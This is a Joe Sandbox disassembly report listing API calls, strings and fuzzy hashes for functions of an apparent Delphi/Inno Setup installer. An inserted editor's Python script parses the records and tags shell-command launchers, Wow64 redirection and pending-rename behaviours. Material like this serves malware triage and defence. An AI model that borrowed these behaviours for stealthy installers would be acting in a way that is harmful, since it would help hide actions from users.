                                                              • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004672A0
                                                              • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00467301
                                                              • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467327
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                              • String ID: c:\directory$shell32.dll$%H
                                                              • API String ID: 3376378930-166502273
                                                              • Opcode ID: d7a251f7ede599729126a20c6e5bc656e487c76ea0efebb03c6af550fa195c4c
                                                              • Instruction ID: 732e1a1751fb8a235258c93266195bfa595ebd68417bad8a6af0601d960a2915
                                                              • Opcode Fuzzy Hash: d7a251f7ede599729126a20c6e5bc656e487c76ea0efebb03c6af550fa195c4c
                                                              • Instruction Fuzzy Hash: 8A516070604244AFD710DF65CD8AFDFB7A8EB48308F1081A6F80897351D6789E81DA59
                                                              APIs
                                                              • GetActiveWindow.USER32 ref: 0042F58F
                                                              • GetFocus.USER32 ref: 0042F597
                                                              • RegisterClassA.USER32(004997AC), ref: 0042F5B8
                                                              • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F68C,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F5F6
                                                              • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F63C
                                                              • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F64D
                                                              • SetFocus.USER32(00000000,00000000,0042F66F,?,?,?,00000001,00000000,?,00458352,00000000,0049B628), ref: 0042F654
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                              • String ID: TWindowDisabler-Window
                                                              • API String ID: 3167913817-1824977358
                                                              • Opcode ID: d82bdac47665a0423d7aef7e4f95abac113c6b4ba7ee72313a02f6ddbd37ff30
                                                              • Instruction ID: c3989f54cd535b42bfd745bd8d6279a550c1ea008e6f4be51b2d228796931bcd
                                                              • Opcode Fuzzy Hash: d82bdac47665a0423d7aef7e4f95abac113c6b4ba7ee72313a02f6ddbd37ff30
                                                              • Instruction Fuzzy Hash: B021A170740710BAE310EF66AD43F1A76B8EB04B44F91853BF604AB2E1D7B86D0586AD
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                              • API String ID: 1646373207-2130885113
                                                              • Opcode ID: d7661fd9f0913dad122060e2c1ded37189c483bc636f4dff06c0b7ded89dfa78
                                                              • Instruction ID: a781b9bdaab79611976bfea65fa4e072d6e85bd62b4b6e26dfe65079d72397a7
                                                              • Opcode Fuzzy Hash: d7661fd9f0913dad122060e2c1ded37189c483bc636f4dff06c0b7ded89dfa78
                                                              • Instruction Fuzzy Hash: EA01D470240B00FED301AF63AD12F663A58D7557ABF6044BBFC14965C2C77C4A088E6D
                                                              APIs
                                                              • RegisterClipboardFormatA.USER32(commdlg_help), ref: 00430948
                                                              • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 00430957
                                                              • GetCurrentThreadId.KERNEL32 ref: 00430971
                                                              • GlobalAddAtomA.KERNEL32(00000000), ref: 00430992
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                              • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                              • API String ID: 4130936913-2943970505
                                                              • Opcode ID: 8a088dfdc0b2c62b7d21c5c596ec815df7ae76573c78c741c8a86d6eee6cb681
                                                              • Instruction ID: 0bd92e6c8c1c5a5b8444157758b44b4e11dae02c37acc47d2edddbd1fb793b69
                                                              • Opcode Fuzzy Hash: 8a088dfdc0b2c62b7d21c5c596ec815df7ae76573c78c741c8a86d6eee6cb681
                                                              • Instruction Fuzzy Hash: 22F012B0458340DEE300EB65994271E7BD0EF58718F50467FF498A6392D7795904CB5F
                                                              APIs
                                                              • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C,00000000), ref: 004551BA
                                                              • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C), ref: 004551C7
                                                                • Part of subcall function 00454F7C: WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
                                                                • Part of subcall function 00454F7C: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
                                                                • Part of subcall function 00454F7C: GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
                                                                • Part of subcall function 00454F7C: CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                              • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                              • API String ID: 854858120-615399546
                                                              • Opcode ID: 5ea26466aa0b1bd12af3311b8e232ebea4e464fdb3bb6eef9ccee3db0f285c88
                                                              • Instruction ID: 058baa7e90e176347c833b132b7c272bf8058e823d6e061bdbf2f6311869cd9e
                                                              • Opcode Fuzzy Hash: 5ea26466aa0b1bd12af3311b8e232ebea4e464fdb3bb6eef9ccee3db0f285c88
                                                              • Instruction Fuzzy Hash: 41516D34B0074DABCF10EFA5D852BDEBBB9AF44305F50447BB804B7292D7789A098B59
                                                              APIs
                                                              • LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
                                                              • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
                                                              • OemToCharA.USER32(?,?), ref: 0042375C
                                                              • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Char$FileIconLoadLowerModuleName
                                                              • String ID: 2$MAINICON
                                                              • API String ID: 3935243913-3181700818
                                                              • Opcode ID: a0d1a492a3e1df344d79b5ede7937f80cf878dadafa44837ceada302c6d607ca
                                                              • Instruction ID: 339a64ebbf2375270c19ef2cfa2d714624ee8dcb7e06b01b5ae6522dc3b50067
                                                              • Opcode Fuzzy Hash: a0d1a492a3e1df344d79b5ede7937f80cf878dadafa44837ceada302c6d607ca
                                                              • Instruction Fuzzy Hash: 243181B0A042549ADF10EF29D8C57C67BA8AF14308F4441BAE844DB393D7BED988CB59
                                                              APIs
                                                              • GetCurrentProcessId.KERNEL32(00000000), ref: 00418F3D
                                                              • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F5E
                                                              • GetCurrentThreadId.KERNEL32 ref: 00418F79
                                                              • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F9A
                                                                • Part of subcall function 004230C8: GetDC.USER32(00000000), ref: 0042311E
                                                                • Part of subcall function 004230C8: EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
                                                                • Part of subcall function 004230C8: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
                                                                • Part of subcall function 004230C8: ReleaseDC.USER32(00000000,00000000), ref: 00423144
                                                                • Part of subcall function 0042368C: LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
                                                                • Part of subcall function 0042368C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
                                                                • Part of subcall function 0042368C: OemToCharA.USER32(?,?), ref: 0042375C
                                                                • Part of subcall function 0042368C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
                                                                • Part of subcall function 0041F118: GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
                                                                • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
                                                                • Part of subcall function 0041F118: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
                                                                • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
                                                                • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
                                                                • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
                                                                • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
                                                                • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
                                                                • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
                                                                • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
                                                                • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
                                                                • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
                                                                • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
                                                                • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$CapsDeviceEnumFileFontsIconLibraryLowerModuleNameProcessReleaseThreadVersion
                                                              • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                              • API String ID: 316262546-2767913252
                                                              • Opcode ID: b417f06b73a7dba032b12b865c8ed9bc6bb92a8bfb887f153b822e9fb73695be
                                                              • Instruction ID: d883a59e21ed3b4d0722d018b4a025de81f9e45e1fd093e44b5ebaba0e30331f
                                                              • Opcode Fuzzy Hash: b417f06b73a7dba032b12b865c8ed9bc6bb92a8bfb887f153b822e9fb73695be
                                                              • Instruction Fuzzy Hash: AC115E706142419AD740FF76A94235A7BE1DF64308F40943FF448A7391DB3DA9448B5F
                                                              APIs
                                                              • SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
                                                              • GetWindowLongA.USER32(?,000000F0), ref: 0041366F
                                                              • GetWindowLongA.USER32(?,000000F4), ref: 00413681
                                                              • SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
                                                              • SetPropA.USER32(?,00000000,00000000), ref: 004136AB
                                                              • SetPropA.USER32(?,00000000,00000000), ref: 004136C2
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: LongWindow$Prop
                                                              • String ID:
                                                              • API String ID: 3887896539-0
                                                              • Opcode ID: 7846fecbe383e6d7fdaea4169180c186d89bab15e88d328ea810806c298c4441
                                                              • Instruction ID: 06abc153636d574f2b9d5b42ed2ef1d3d1989bf2b09c04f5b7aa0ee96fd2bcf7
                                                              • Opcode Fuzzy Hash: 7846fecbe383e6d7fdaea4169180c186d89bab15e88d328ea810806c298c4441
                                                              • Instruction Fuzzy Hash: 1011C975100244BFEF00DF9DDC84EDA37E8EB19364F144666B958DB2A2D738DD908B68
                                                              APIs
                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                              • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0045586F,?,00000000,004558AF), ref: 004557B5
                                                              Strings
                                                              • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455738
                                                              • PendingFileRenameOperations, xrefs: 00455754
                                                              • PendingFileRenameOperations2, xrefs: 00455784
                                                              • WININIT.INI, xrefs: 004557E4
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CloseOpen
                                                              • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                              • API String ID: 47109696-2199428270
                                                              • Opcode ID: 430bb035026106b65f85e2b07525b73901b650abba9068f13605831850c1f819
                                                              • Instruction ID: 0fa1da25f67206326559771d92c7e47b52ca8d856d575cc5f046ac455f5bab2a
                                                              • Opcode Fuzzy Hash: 430bb035026106b65f85e2b07525b73901b650abba9068f13605831850c1f819
                                                              • Instruction Fuzzy Hash: FF51A974E006089FDB10EF61DC51AEEB7B9EF44305F50857BEC04A7292DB78AE49CA58
                                                              APIs
                                                              • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047CCEA,?,?,00000000,0049B628,00000000,00000000,?,00498539,00000000,004986E2,?,00000000), ref: 0047CC27
                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,0047CCEA,?,?,00000000,0049B628,00000000,00000000,?,00498539,00000000,004986E2,?,00000000), ref: 0047CC30
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectoryErrorLast
                                                              • String ID: Created temporary directory: $\_setup64.tmp$_isetup
                                                              • API String ID: 1375471231-2952887711
                                                              • Opcode ID: 18b8a6295044c03030742dd0e1a53df86680db30ea117cbe65252b99daff8b31
                                                              • Instruction ID: e6577b7b61f0e0a35e690824fc442bae28cfcbc8f9cba78cd8161ab2dbd6b5d1
                                                              • Opcode Fuzzy Hash: 18b8a6295044c03030742dd0e1a53df86680db30ea117cbe65252b99daff8b31
                                                              • Instruction Fuzzy Hash: E6412834A001099BDB11EFA5D882ADEB7B5EF45309F50843BE81577392DA38AE05CF68
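The records above follow one layout throughout the report: an "APIs" list with the stack arguments the sandbox saw at each call site (nested "Part of subcall function" lines for callees), a "Strings" section with cross-references, the memory-dump source, and the "Similarity" keys (API ID, String ID, opcode and instruction fuzzy hashes). On a report this long it is faster to parse the blocks than to read them, and several of the records here are the ones a triager wants pulled out: the GetModuleHandleA/GetProcAddress pair resolving Wow64DisableWow64FsRedirection and Wow64RevertWow64FsRedirection, the `cmd.exe" /C "` / `COMMAND.COM" /C ` launcher for .bat/.cmd files, and the PendingFileRenameOperations lookup under Session Manager. The following Python is an added example written by the editor; it is not part of the Joe Sandbox report or its tooling. The two sample records are constructed from the layout of the blocks above, the regular expression encodes the editor's reading of that layout, and the four tag names in `triage()` are the editor's keyword heuristics, not Joe Sandbox signatures.

```python
"""Parse Joe Sandbox per-function records ("APIs / Strings / Similarity" blocks)
into structured data and tag behaviours a triager cares about.  Added example;
the layout assumptions and the tag keywords are the editor's, not Joe Sandbox's."""
import re
from dataclasses import dataclass, field

# One API line. Accepted shapes (as they appear in the report, bullet removed):
#   GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
#   GetActiveWindow.USER32 ref: 0042F58F
#   Part of subcall function 00454F7C: GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-Fa-f]{8}): )?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]{8})$"
)
HEX_RE = re.compile(r"^[0-9A-Fa-f]{8}$")   # stack slots the sandbox prints as 8 hex digits
META_SECTIONS = {"Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# Constructed sample input mirroring the report layout (test data, not a new capture).
SAMPLE_REPORT = """
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?), ref: 00453210
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
Strings
Memory Dump Source
• Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AddressHandleModuleProc
• String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll
• Instruction Fuzzy Hash: EA01D470240B00FED301AF63AD12F663A58D7557ABF6044BBFC14965C2C77C4A088E6D
APIs
• GetLastError.KERNEL32(?,00000044,00000000,COMMAND.COM" /C ,?,0045522C), ref: 004551BA
  • Part of subcall function 00454F7C: GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
Strings
• WININIT.INI, xrefs: 004557E4
Similarity
• API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
• String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
• Instruction Fuzzy Hash: 41516D34B0074DABCF10EFA5D852BDEBBB9AF44305F50447BB804B7292D7789A098B59
"""


@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)    # dicts: api, module, args, ref, caller
    strings: list = field(default_factory=list)  # (text, xref) from the Strings section
    meta: dict = field(default_factory=dict)     # "API ID", "String ID", fuzzy hashes, ...

    def api_names(self) -> set:
        return {c["api"] for c in self.calls}

    def literals(self) -> set:
        """All string constants visible for the function: non-hex call arguments,
        Strings entries, and the '$'-joined Similarity 'String ID' (a literal that
        itself contains '$' would be split; acceptable for keyword tagging)."""
        out = {a for c in self.calls for a in c["args"]
               if a not in ("", "?") and not HEX_RE.match(a)}
        out |= {text for text, _ in self.strings}
        out |= {s for s in self.meta.get("String ID", "").split("$") if s}
        return out


def parse_records(report_text: str) -> list:
    records, current, section = [], None, None
    for raw in report_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":                       # each record opens with its API list
            current = FunctionRecord()
            records.append(current)
            section = "APIs"
            continue
        if current is None:
            continue
        if line == "Strings" or line in META_SECTIONS:
            section = line
            continue
        if not line.startswith("•"):
            continue
        item = line.lstrip("•").strip()
        if section == "APIs":
            m = API_RE.match(item)
            if m:
                raw_args = m.group("args")
                args = [a.strip() for a in raw_args.split(",")] if raw_args else []
                current.calls.append({"api": m.group("api"), "module": m.group("module"),
                                      "args": args, "ref": m.group("ref"),
                                      "caller": m.group("caller")})
        elif section == "Strings":
            text, sep, xref = item.rpartition(", xrefs: ")
            current.strings.append((text, xref) if sep else (item, ""))
        elif not item.startswith("Associated"):  # skip the per-record copies of the dump list
            key, _, value = item.partition(":")
            current.meta[key.strip()] = value.strip()
    return records


def triage(rec: FunctionRecord) -> list:
    """Editor-chosen keyword heuristics for behaviours seen in this report."""
    lits, tags = rec.literals(), []
    if "GetProcAddress" in rec.api_names():
        tags.append("dynamic-api-resolution")
    if any(s.startswith("Wow64") for s in lits):
        tags.append("wow64-fs-redirection")
    if any("/C" in s for s in lits):             # cmd.exe /C, COMMAND.COM /C launchers
        tags.append("shell-command")
    if any(s.startswith("PendingFileRenameOperations") for s in lits):
        tags.append("pending-file-rename")
    return tags


def summarize(report_text: str) -> list:
    return [{"api_id": r.meta.get("API ID", ""), "tags": triage(r),
             "first_ref": r.calls[0]["ref"] if r.calls else None,
             "ifh": r.meta.get("Instruction Fuzzy Hash", "")[:16]}
            for r in parse_records(report_text)]


if __name__ == "__main__":
    for row in summarize(SAMPLE_REPORT):
        print(row)
```

Feed the function listing of the whole report to `summarize()` instead of the constructed sample to get one row per function; the `ref` addresses let you jump to the call site in IDA, and the opcode and instruction fuzzy hashes give a stable key for matching the same Delphi/Inno Setup runtime functions across other samples in the family.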
                                                              APIs
                                                              • EnumWindows.USER32(00423A1C), ref: 00423AA8
                                                              • GetWindow.USER32(?,00000003), ref: 00423ABD
                                                              • GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
                                                              • SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Window$EnumLongWindows
                                                              • String ID: \AB
                                                              • API String ID: 4191631535-3948367934
                                                              • Opcode ID: 1f387ac1e946b45dcea70a74dde1e3cf145931a60cd8f654a7309261af8d74ee
                                                              • Instruction ID: 3ad81c14f5822e14e615a382c86082b2427cd388a5bf15486a3129e996868218
                                                              • Opcode Fuzzy Hash: 1f387ac1e946b45dcea70a74dde1e3cf145931a60cd8f654a7309261af8d74ee
                                                              • Instruction Fuzzy Hash: D6115E70700610ABDB109F28E885F5677E8EB08715F10026AF994AB2E3C378ED41CB59
                                                              APIs
                                                              • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DE50
